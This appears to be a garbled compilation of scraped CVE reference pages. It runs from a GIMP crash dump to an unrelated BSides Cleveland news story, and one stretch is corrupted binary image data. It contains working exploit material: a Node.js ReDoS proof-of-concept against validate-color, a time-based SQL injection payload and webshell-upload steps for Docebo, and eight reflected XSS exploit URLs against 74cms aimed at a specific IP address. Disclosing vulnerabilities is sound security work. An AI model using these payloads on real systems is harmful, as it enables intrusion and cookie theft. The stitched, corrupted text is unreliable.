-Wl,--dynamicbase,--high-entropy-va,--nxcompat,--default-image-base-high\ -Wl,--stack,12582912'
    	Thread model: posix
    	Supported LTO compression algorithms: zlib zstd
    	gcc version 11.2.0 (Rev5, Built by MSYS2 project) 
    
    # Libraries #
    using babl version 0.1.88 (compiled against version 0.1.88)
    using GEGL version 0.4.34 (compiled against version 0.4.34)
    using GLib version 2.70.2 (compiled against version 2.70.2)
    using GdkPixbuf version 2.42.6 (compiled against version 2.42.6)
    using GTK+ version 2.24.33 (compiled against version 2.24.33)
    using Pango version 1.50.2 (compiled against version 1.50.2)
    using Fontconfig version 2.13.94 (compiled against version 2.13.94)
    using Cairo version 1.17.4 (compiled against version 1.17.4)
    

    -------------------
    
    Error occurred on Friday, June 3, 2022 at 15:37:43.
    
    gimp-2.10.exe caused an Access Violation at location 00007FF692DE9E5C in module gimp-2.10.exe Writing to location 000000000000008C.
    
    AddrPC           Params
    00007FF692DE9E5C 000001C7F701D540 00007FF692DB3D5F 000001C700000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692DB55A4 000001C7F5B001D0 0000007EBE1FEE90 000001C700000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692DB6B74 0000007EBE1FEF52 00007FF6931F7610 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C83BCF 000001C7EBD2D290 00007FFBB6D653A6 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C7F340 000001C7EBDC8310 000001C7F663A430 000001C7B1B27370  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C7F4F9 000001C7EBDC8810 000001C7F4594560 0000000000000001  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D21BE0 000001C7EBEC7240 000001C7EBEF50B0 000001C700000003  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D14FF9 0000000000000003 00007FF692D14AF4 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D0E43C 0000000000000000 0000000000000020 000001C7F7156780  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D0E8B7 000001C7EBE70C80 000001C7EBECA230 000001C7F663A430  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692E304A4 0000000000000000 0000000000000000 000001C7F663A430  gimp-2.10.exe!gimp_core_pixbufs_get_resource
    00007FF692DDA679 000001C7EBD2D290 0000000000000000 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692DDA785 000001C7F7021760 000001C7F7043F10 000001C7F65BC168  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C4AE7C 000001C7B3B79860 00007FFBB6B5BB20 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FFBB6B58D47 000001C700000000 0000007EBE1FF688 000001C7B3B26870  libglib-2.0-0.dll!g_clear_list
    00007FFBB6B5BEDE 0000000000000000 0000000000000000 000001C7EBD2D290  libglib-2.0-0.dll!g_main_context_check
    00007FFBB6B5C3FC 0000000000000000 0000000000000000 0000000000000000  libglib-2.0-0.dll!g_main_loop_run
    00007FF692A31A2B 00007FFC2C7093B0 000001C7B1B4E480 000001C7B1C00860  gimp-2.10.exe!0x7ff600001a2b
    00007FF692ECF67F 0000000000000000 000001C7B1B50E60 0000000000000000  gimp-2.10.exe!gimp_core_pixbufs_get_resource
    00007FF692A313B1 0000000000000000 0000000000000000 0000000000000000  gimp-2.10.exe!0x7ff6000013b1
    00007FF692A314C6 0000000000000000 0000000000000000 0000000000000000  gimp-2.10.exe!0x7ff6000014c6
    00007FFC2C7054E0 0000000000000000 0000000000000000 0000000000000000  KERNEL32.DLL!BaseThreadInitThunk
    00007FFC2E80485B 0000000000000000 0000000000000000 0000000000000000  ntdll.dll!RtlUserThreadStart
    
    gimp-2.10.exe	2.10.30.0
    ntdll.dll   	10.0.22000.653
    KERNEL32.DLL	10.0.22000.675
    KERNELBASE.dll	10.0.22000.675
    msvcrt.dll  	7.0.22000.1
    ole32.dll   	10.0.22000.120
    msvcp_win.dll	10.0.22000.1
    ucrtbase.dll	10.0.22000.1
    GDI32.dll   	10.0.22000.1
    win32u.dll  	10.0.22000.675
    gdi32full.dll	10.0.22000.675
    USER32.dll  	10.0.22000.282
    combase.dll 	10.0.22000.653
    RPCRT4.dll  	10.0.22000.675
    SHELL32.dll 	10.0.22000.593
    libgimpmodule-2.0-0.dll
    libgimpcolor-2.0-0.dll
    libgimpmath-2.0-0.dll
    libgimpconfig-2.0-0.dll
    libgimpthumb-2.0-0.dll
    libgimpwidgets-2.0-0.dll
    libgimpbase-2.0-0.dll
    exchndl.dll 	0.8.2.0
    PSAPI.DLL   	10.0.22000.1
    libbabl-0.1-0.dll
    libcairo-2.dll
    dbghelp.dll 	6.3.9600.17298
    libfontconfig-1.dll
    libgdk_pixbuf-2.0-0.dll	2.42.6.0
    libfreetype-6.dll	2.11.1.0
    ADVAPI32.dll	10.0.22000.653
    sechost.dll 	10.0.22000.556
    libgexiv2-2.dll
    libgio-2.0-0.dll	2.70.2.0
    libgobject-2.0-0.dll	2.70.2.0
    libglib-2.0-0.dll	2.70.2.0
    SHLWAPI.dll 	10.0.22000.1
    WS2_32.dll  	10.0.22000.1
    libharfbuzz-0.dll
    libintl-8.dll	0.19.8.0
    libjson-glib-1.0-0.dll
    liblcms2-2.dll
    libmypaint-0.dll
    libpangoft2-1.0-0.dll	1.50.2.0
    libpango-1.0-0.dll	1.50.2.0
    libpangocairo-1.0-0.dll	1.50.2.0
    zlib1.dll
    libgdk-win32-2.0-0.dll	2.24.33.0
    libgegl-0.4-0.dll
    libgegl-npd-0.4.dll
    libgtk-win32-2.0-0.dll	2.24.33.0
    IMM32.dll   	10.0.22000.1
    libgmodule-2.0-0.dll	2.70.2.0
    mscms.dll   	10.0.22000.469
    comdlg32.dll	10.0.22000.527
    VERSION.dll 	10.0.22000.1
    shcore.dll  	10.0.22000.613
    MSIMG32.dll 	10.0.22000.1
    mgwhelp.dll 	0.8.2.0
    libgcc_s_seh-1.dll
    libpixman-1-0.dll
    libexpat-1.dll
    libpng16-16.dll
    libiconv-2.dll	1.16.0.0
    gdiplus.dll 	10.0.22000.675
    libbz2-1.dll
    libbrotlidec.dll
    libstdc++-6.dll
    libffi-7.dll
    DNSAPI.dll  	10.0.22000.653
    IPHLPAPI.DLL	10.0.22000.282
    USP10.dll   	10.0.22000.1
    libexiv2.dll
    libwinpthread-1.dll	1.0.0.0
    libpcre-1.dll
    libgraphite2.dll
    libjson-c-5.dll
    libpangowin32-1.0-0.dll	1.50.2.0
    libfribidi-0.dll
    libthai-0.dll
    COMCTL32.dll	5.82.22000.1
    bcrypt.dll  	10.0.22000.1
    cfgmgr32.dll	10.0.22000.1
    WINSPOOL.DRV	10.0.22000.675
    libatk-1.0-0.dll	2.36.0.0
    libbrotlicommon.dll
    libcurl-4.dll
    CRYPT32.dll 	10.0.22000.348
    WLDAP32.dll 	10.0.22000.675
    libdatrie-1.dll
    libnghttp2-14.dll
    libidn2-0.dll
    libcrypto-1_1-x64.dll	1.1.1.12
    libpsl-5.dll
    libssh2-1.dll
    libssl-1_1-x64.dll	1.1.1.12
    libzstd.dll
    libunistring-2.dll	0.9.10.0
    NSI.dll     	10.0.22000.1
    windows.storage.dll	10.0.22000.675
    wintypes.dll	10.0.22000.527
    kernel.appcore.dll	10.0.22000.71
    bcryptPrimitives.dll	10.0.22000.376
    uxtheme.dll 	10.0.22000.120
    MSCTF.dll   	10.0.22000.527
    avx2-int8.dll
    cairo.dll
    CIE.dll
    double.dll
    fast-float.dll
    float.dll
    gegl-fixups.dll
    gggl-lies.dll
    gggl-table-lies.dll
    gggl-table.dll
    gggl.dll
    gimp-8bit.dll
    grey.dll
    half.dll
    HCY.dll
    HSL.dll
    HSV.dll
    naive-CMYK.dll
    simple.dll
    sse-half.dll
    sse2-float.dll
    sse2-int16.dll
    sse2-int8.dll
    sse4-int8.dll
    two-table.dll
    u16.dll
    u32.dll
    ycbcr.dll
    gegl-core.dll
    profapi.dll 	10.0.22000.1
    OLEAUT32.dll	10.0.22000.1
    clbcatq.dll 	2001.12.10941.16384
    propsys.dll 	7.0.22000.37
    apphelp.dll 	10.0.22000.282
    NetworkExplorer.dll	10.0.22000.51
    winhttp.dll 	10.0.22000.1
    exr-load.dll
    libIlmImf-2_5.dll
    libIex-2_5.dll
    libHalf-2_5.dll
    libIlmThread-2_5.dll
    libImath-2_5.dll
    gegl-common-gpl3.dll
    gegl-common.dll
    gif-load.dll
    jp2-load.dll
    libjasper-4.dll
    libjpeg-8.dll
    jpg-load.dll
    pdf-load.dll
    libpoppler-glib-8.dll
    libpoppler-115.dll
    nss3.dll    	3.73.1.0
    libnspr4.dll	4.31.0.0
    libplc4.dll 	4.31.0.0
    smime3.dll  	3.73.1.0
    libopenjp2-7.dll
    libtiff-5.dll
    libplds4.dll	4.31.0.0
    nssutil3.dll	3.73.1.0
    MSWSOCK.dll 	10.0.22000.1
    WINMM.dll   	10.0.22000.1
    libjbig-0.dll
    libdeflate.dll
    libLerc.dll
    liblzma-5.dll	5.2.5.0
    libwebp-7.dll
    pixbuf-load.dll
    png-load.dll
    ppm-load.dll
    raw-load.dll
    libraw-20.dll
    libgomp-1.dll
    rgbe-load.dll
    svg-load.dll
    librsvg-2-2.dll
    libcairo-gobject-2.dll
    USERENV.dll 	10.0.22000.1
    libxml2-2.dll
    text.dll
    tiff-load.dll
    webp-load.dll
    exr-save.dll
    jpg-save.dll
    npy-save.dll
    pixbuf-save.dll
    png-save.dll
    ppm-save.dll
    rgbe-save.dll
    sdl2-display.dll
    SDL2.dll    	2.0.18.0
    SETUPAPI.dll	10.0.22000.469
    tiff-save.dll
    webp-save.dll
    gegl-common-cxx.dll
    lcms-from-profile.dll
    npd.dll
    path.dll
    transformops.dll
    vector-stroke.dll
    seamless-clone-compose.dll
    gegl-generated.dll
    matting-levin.dll
    libumfpack.dll
    libamd.dll
    libsuitesparseconfig.dll
    libcholmod.dll
    libcamd.dll
    libccolamd.dll
    libmetis.dll
    libcolamd.dll
    libopenblas.dll
    libgfortran-5.dll
    libquadmath-0.dll
    seamless-clone.dll
    libgegl-sc-0.4.dll
    libwimp.dll
    libpixmap.dll
    libpixbufloader-png.dll
    libpixbufloader-svg.dll
    icm32.dll   	10.0.22000.469
    textinputframework.dll	10.0.22000.282
    CoreMessaging.dll	10.0.22000.71
    CoreUIComponents.dll	10.0.22000.132
    CRYPTBASE.DLL	10.0.22000.1
    PalmInputTSF.dll	2.7.0.1702
    ntmarta.dll 	10.0.22000.1
    AppXDeploymentClient.dll	10.0.22000.469
    urlmon.dll  	11.0.22000.653
    iertutil.dll	11.0.22000.653
    netutils.dll	10.0.22000.434
    srvcli.dll  	10.0.22000.613
    TextShaping.dll
    Windows.ApplicationModel.dll	10.0.22000.593
    mssprxy.dll 	7.0.22000.593
    mrmcorer.dll	10.0.22000.120
    windows.staterepositorycore.dll	10.0.22000.65
    windows.staterepositoryclient.dll	10.0.22000.653
    bcp47mrm.dll	10.0.22000.65
    Windows.UI.dll	10.0.22000.1
    CRYPTSP.dll 	10.0.22000.1
    rsaenh.dll  	10.0.22000.282
    shfolder.dll	10.0.22000.1
    webio.dll   	10.0.22000.1
    WINNSI.DLL  	10.0.22000.1
    SspiCli.dll 	10.0.22000.556
    rasadhlp.dll	10.0.22000.1
    fwpuclnt.dll	10.0.22000.593
    schannel.DLL	10.0.22000.675
    mskeyprotect.dll	10.0.22000.1
    NTASN1.dll  	10.0.22000.1
    ncrypt.dll  	10.0.22000.1
    ncryptsslp.dll	10.0.22000.1
    MSASN1.dll  	10.0.22000.1
    DPAPI.DLL   	10.0.22000.1
    comctl32.dll	6.10.22000.120
    WindowsCodecs.dll	10.0.22000.653
    
    Windows 10.0.22000
    DrMingw 0.8.2

CVE-2022-32990: Trigger a unhandled exception in GIMP 2.10.30 (#8230) · Issues · GNOME / GIMP

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in validate-color v2.1.0 when handling crafted invalid rgb(a) strings.

Permalink

Cannot retrieve contributors at this time

/\*\*

\* validate-color@2.1.0

\* Package Manager: npm

\* Link to published package: https://github.com/dreamyguy/validate-color

\* Link to GitHub repo: https://github.com/dreamyguy/validate-color

\* Severity level: High

\* Module Description: Validate HTML colors by 'name', 'special name', 'hex', 'rgb', 'rgba', 'hsl', 'hsla', 'hwb' or 'lab' values

\* Additional Info: It allows cause a denial of service when handling crafted invalid rgb(a) strings.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

require("react/package.json"); // react is a peer dependency.

require("react-dom/package.json"); // react-dom is a peer dependency.

var validateColor \= require("validate-color")

function build\_blank(n) {

var ret \= "rgb(0"

for (var i \= 0; i < n; i++) {

ret += " "

}

return ret + "!";

}

//validateColor.validateHTMLColorRgb('rgb(0 0 0)')

for(var i \= 1; i <= 5000000; i++) {

if (i % 100 \== 0) {

var time \= Date.now();

var attack\_str \= build\_blank(i)

validateColor.validateHTMLColorRgb(attack\_str)

var time\_cost \= Date.now() \- time;

console.log("attack\_str.length: " + attack\_str.length + ": " + time\_cost+" ms")

}

}

CVE-2021-40892: SaveResults/validate-color.js at main · yetingli/SaveResults

Fury among online community over decision to include presenter

Fury among online community over decision to include presenter

The organizer of BSides Cleveland has stepped down after an online backlash that followed a controversial figure being invited to speak as a “surprise”.

The annual infosec conference, held last weekend (June 17-18), saw a handful of speakers walk out in protest over the appearance of social engineering expert Chris Hadnagy.

Hadnagy is a controversial figure in the hacking community and has previously been banned from DEF CON, the iconic hacking conference, due to allegations he violated the event’s code of conduct.

He had been added to the bill to speak as a ‘special guest’ on day two of the conference. However, when other community members found out he was appearing, the backlash prompted some speakers to abandon their presentations.

Read more of the latest news from the infosec community

John Strand, known online as ‘strandjs’, was due to present a talk but announced on Twitter that he would instead be leaving the event, writing online that the situation “sucks”.

Dave Kennedy, who was also scheduled to speak, echoed Strand’s thoughts, concluding it was “the right decision to pull it”. 

Rockie Brockway, BSides Cleveland organizer, has since released a statement taking responsibility for the incident and announcing that he is stepping down from the role.

Brockway posted online (non-HTTPS link): “The decision to include Chris Hadnagy in the 2022 BSidesCleveland event was my decision. Furthermore, the decision to keep the opening speaker slot as Special Guest instead of naming Chris specifically was also my decision.

“I am apologizing to everyone that my decisions harmed, whether strangers, family, sponsors, or friends, and I am deeply sorry for that. I understand that my decisions may have destroyed the trust that I have built over my years in the BSides community, and I accept accountability for my actions.

“Effective immediately I resign from BSidesCLE leadership.”

**New direction**

The founders of Security BSides, which does not organize local chapter events such as BSides Cleveland, have since issued a call for volunteers to step forward as new organizers.

It read: “Is it possible to host controversial speakers at a BSides conference? Absolutely, but there’s a right way to go about it.

“Organizers should discuss among themselves. They should seek input from their community. The details of the controversy should be considered, including both the benefits and drawbacks of allowing a controversial figure to speak.

“All volunteers, sponsors, and attendees should be notified and given ample time to decide whether to participate.”

**Statement**

Chris Hadnagy told The Daily Swig in response: “I do want to apologize to anyone who was confused or upset by the lack of advance notice about my appearance. This was simply an oversight and not done deliberately.

“The organizers of BSides Cleveland do not deserve the level of criticism they have received, a lot of which appears to be from people who weren’t even at the conference. I hope people will understand that the BSides organizers are good, hardworking people who volunteered their time to put on a great conference that tried to cover many important issues in our field. They had no ill-intent. Neither did I.

“I really do hope that we can reach a point in our industry – and society at large – where we can have open and honest conversations again, and a willingness to hear from both sides of an issue, before immediately deciding the worst about someone and reverting to online attacks and shaming.

“I have faced criticism for the last few months over a murky decision made by DEF CON that has never been properly explained by them. This has caused me, my family, my colleagues, and my friends a great deal of harm.

“I am not guilty of any crimes, but I am being treated like a criminal by some in the infosec community. I am very sorry for any trouble that my appearance this weekend caused to BSides, the other speakers, the attendees, and the sponsors.”

YOU MAY ALSO LIKE Security researcher receives legal threat over patched Powertek data center vulnerabilities

BSides Cleveland organizer steps down after controversial guest added as ‘surprise’ speaker

In CODESYS V2 PLCWinNT and Runtime Toolkit 32 in versions prior to V2.4.7.57 password protection is not enabled by default and there is no information or prompt to enable password protection at login in case no password is set at the controller.

\>\`>�>�?!?a?�?�@#@d@�@�A)AjA�A�B0BrB�B�C:C}C�DDGD�D�EEUE�E�F"FgF�F�G5G{G�HHKH�H�IIcI�I�J7J}J�KKSK�K�L\*LrL�MMJM�M�N%NnN�OOIO�O�P'PqP�QQPQ�Q�R1R|R�SS\_S�S�TBT�T�U(UuU�VV\\V�V�WDW�W�X/X}X�YYiY�ZZVZ�Z�\[E\[�\[�\\5\\�\\�\]'\]x\]�^^l^�\_\_a\_�\`\`W\`�\`�aOa�a�bIb�b�cCc�c�d@d�d�e=e�e�f=f�f�g=g�g�h?h�h�iCi�i�jHj�j�kOk�k�lWl�mm\`m�nnkn�ooxo�p+p�p�q:q�q�rKr�ss\]s�ttpt�u(u�u�v>v�v�wVw�xxnx�y\*y�y�zFz�{{c{�|!|�|�}A}�~~b~�#��G��� �k�͂0����W�������G����r�ׇ;����i�Ή3�����d�ʋ0�����c�ʍ1�����f�Ώ6����n�֑?����z��M��� �����\_�ɖ4��� �u���L���$�����h�՛B��������d�Ҟ@��������i�ءG���&����v��V�ǥ8��������n��R�ĩ7�������u��\\�ЭD���-�������u��\`�ֲK�³8���%�������y��h��Y�ѹJ�º;���.���!������ �����z���p���g���\_���X���Q���K���F���Aǿ�=ȼ�:ɹ�8ʷ�6˶�5̵�5͵�6ζ�7ϸ�9к�<Ѿ�?���D���I���N���U���\\���d���l���v��ۀ�܊�ݖ�ޢ�)߯�6��D���S���c���s���� ����2��F���\[���p������(��@���X���r������4���P���m��������8���W���w����)���K���m����C    $.' ",#(7),01444'9=82<.342��C  2!!22222222222222222222222222222222222222222222222222��c"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�J(�� (�� (�� (��t���A�66t�����������?���8������\`Q\[���/�������G�#��?'�������������?���8������\`Q\[���/�������G�#��?'�������������?���8������\`Q\[���/�������G�#��?'�������������?����i���Q!}���� 4QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE���g��k�������=!��k��Z(�� (�� (�� (�� (�� (�� �I�5��V����1��sf=U��e�M^��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��+����H��\*�k����H��\*��(�����8�ˉDi�d��r��Lr�Q������:K��mb2O"ƃ��o�U�,c����?ƹ�o.'b�J�g�s�L�?C��O��:h\[��Q�R�7� �\\d�������S�H{9�O��5Ƙ0d�����z'������@�Epz����fi�RC��l

CVE-2022-31806

** UNSUPPORTED WHEN ASSIGNED ** Docebo Community Edition v4.0.5 and below was discovered to contain a SQL injection vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

**Product description**

Swascan Offensive Security Team has identified multiple vulnerabilities on **Docebo Community Edition 4.0.5**, an open source e-learning platform also defined as Learning Management System.

**Technical summary**

Swascan’s Cyber Security Team discovered important vulnerabilities on Docebo CE <= v.4.0.5

**Vulnerability**

**CVSS 3.1**

**Docebo CE <= 4.0.5 – SQL Injection (unauthenticated)**

**8.6 – High  
**\[AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L\]

**Docebo CE <= 4.0.5 – Arbitrary File Upload (Authenticated)**

**8.8 – High  
**\[AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\]

In the following section the technical details about this vulnerability, including evidence and a proof-of-concept. This vulnerability can affect hundred applications.

**Exploiting Docebo 4.0.5 Community Edition**

Due to an unauthenticated SQL Injection and an authenticated Abitrary File Upload, it’s possible to gain a Remote Command Execution upon Docebo 4.0.5 Community Edition.

**Unauthenticated SQL Injection**

The application is vulnerable to unauthenticated SQL Injection attacks.

A remote unauthenticated attacker could exploit this vulnerability in order to access to the application DataBase. Once exploited, the attacker can exfiltrate or overwrite  all the data within.

However, to exploit this vulnerability, the attacker needs to perform a large amount of HTTP request retrieving one character at a time.

Evidence 1 – Docebo Community Edition 4.0.5 – changelog.txt

The following figures show the evidences of the vulnerability and how it can be exploited. The Time-Based (Blind) technique has been used performing several HTTP requests and comparing the response time deelay.

Payload to verify:

    test+AND+(SELECT+1+FROM(SELECT(SLEEP(5)))a)

This specific payload works for MySQL database >= 5.0.12.

Evidence 2 – SQL Injection detection – payload to verify

Evidence 3 – SQL Injection Time Based – 5 seconds delay

The time delay of 5 seconds confirms the vulnerability due to the SQL command injected **SLEEEP(5)**.

The exploitation of this vulnerability doesn’t require any type of authentication.

Performing this attack, it’s possible to exfiltrate the users credentials (hashed) and, if cracked, log into the application.

Evidence 5 – User and Database name

Evidence 6 – Hashed credentials

**Remediation**

Review the validation logic of the information entered by the user so that a correct control of the input parameters is carried out using one or more of the following programming techniques:

*   Use of Prepared Statements (parameterized queries);
*   Use of Stored Procedures;
*   Validation and escaping of all user inputs that are used as query parameters;

It is also recommended to carry out the same checks in a timely manner on all queries made to the database since the same vulnerability may be present in many other points of the application than those reported.

**Authenticated Arbitrary File Upload**

After gaining an access to the application, an attacker could upload malicious files which could lead to arbitrary command execution on the remote server. The attacker could also use this vulnerability to upload a large file that may result in a Denial of Service (DoS).

It is shown below how it was possible to take advantage of the features of the application to upload a web shell written in **php** to the server.

To obtain this result the steps are the following:

1.  Access to the avatar upload function
2.  Append php code inside the field “up\_avatar”
3.  URL identification for webshell
4.  Execution of arbitrary commands

The process is described by the following evidences:

Evidence 7 – HTTP Request to upload user avatar and payload injected in the field up\_avatar

Evidence 8 – HTTP Response and identification of the URL to access to the webshell

Evidence 9 – Execution of arbitrary commands using the webshell uploaded in the previous step

**Remediation**

It is recommended to:

• Review the input validation of the file upload function, specifically, it is necessary to allow only the upload of file types functional to the business logic (for example, only images, PDF documents, etc …) through a whitelisting type filter (possibility of uploading only authorized file types);

• Block and notify the system administrator of the loading of the remaining types of files that could be interpreted and executed by the Web Server such as, for example, PHP, ASP, ASPX, JSP, etc …

For more details, refer to the user language and framework documentation and the OWASP SDLC guidelines.

**Sources and references**

  
https://www.owasp.org/index.php/SQL\_Injection

https://cwe.mitre.org/data/definitions/89.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://docs.microsoft.com/it-it/dotnet/standard/security/secure-coding-guidelines

https://cwe.mitre.org/data/definitions/434.html

https://cheatsheetseries.owasp.org/cheatsheets/DotNet\_Security\_Cheat\_Sheet.html

https://owasp.org/Top10/it/A04\_2021-Insecure\_Design/

CVE-2022-31361: Security Advisory: Docebo Community Edition <= 4.0.5 - Swascan

74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.

**Vulnerability name**：Reflective XSS  
**Date of Discovery**: 30/5/2022  
**Affected version**: 74cmsSE\_v3.5.1  
**Download link**: http://www.74cms.com/downloadse/show/id/68.html  
Vulnerability Description:  
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

Vulnerability location：Many places，Here are some places I found:  
Verification process：  
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>

With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS

2、exp：http://124.223.95.129:8766/job/?"<ScRiPt>alert("xss");<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

3、exp：http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

4、exp：http://124.223.95.129:8766/company/view\_be\_browsed/total/d1/\_d1\_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

5、exp：http://124.223.95.129:8766/company/service/increment/add/im/d1/\_d1\_/d2/\_d2\_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

8、exp: http://124.223.95.129:8766/company/down\_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page

  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

Repair method：  
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)

Tag

#js